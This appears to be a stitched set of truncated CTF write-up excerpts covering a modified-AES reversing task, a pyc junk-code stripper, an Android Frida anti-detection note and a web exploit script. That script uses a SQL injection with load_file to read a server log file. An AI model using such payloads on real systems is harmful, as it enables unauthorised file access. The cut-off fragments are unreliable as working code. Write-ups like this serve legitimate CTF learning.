The first part is Re_1s_eaSy. For the second part, locate the AES tables by their characteristic constants. There is a pitfall here: the AES S-box has been modified... Derive the inverse S-box from the modified S-box:
new_s_box = [0x29,0x40,0x57,0x6E,0x85,0x9C,0xB3,0xCA,0xE1,0xF8,0x0F,0x26,0x3D,0x54,0x6B,0x82,0x99,0xB0,0xC7,0xDE,0xF5,0x0C,0x23,0x3A,0x51,0x68,0x7F,0x96,0x...
The pyc contains junk instructions. Static analysis reveals a fixed pattern, so the following script strips the junk with a regex match:
import re
r = re.compile(b'\x6e\x00\x6e\x04.{4}\x6e\x02.{2}', re.DOTALL)
with open('./RightBack.bin', 'rb') as pyc:
    code = pyc.read()
ret_arr = r.findall(code)
for ret in ret_arr:
    code = code.replace(ret, b'\x09\x09\...
import requests, re
import time
# challenge address
SERVER_ADDR = "http://192.168.1.1:80"
# address of the Docker instance you started yourself; the port defaults to 3306
DOCKER_ADDR = "8.8.8.8"
def get_pin():
    resp = requests.get(SERVER_ADDR + "/post/11111111%20union%20select%201,load_file('%2fhome%2fezblog%2f.pm2%2flogs%2fmain-out.log'),1/edit"...
First open it with jadx; it is not packed. The key parts are just these few places, and you can see that the verification function is a native function, so open the .so in IDA. The only exported function is JNI_OnLoad, so the functions should be registered dynamically. Use Frida to hook the registration address; I happened to have a hook script from when I studied VMP packers and used it directly, but the app crashed after hooking, so there is Frida detection. I had previously glanced at an all-in-one anti-anti-Frida script, so I put the two together ...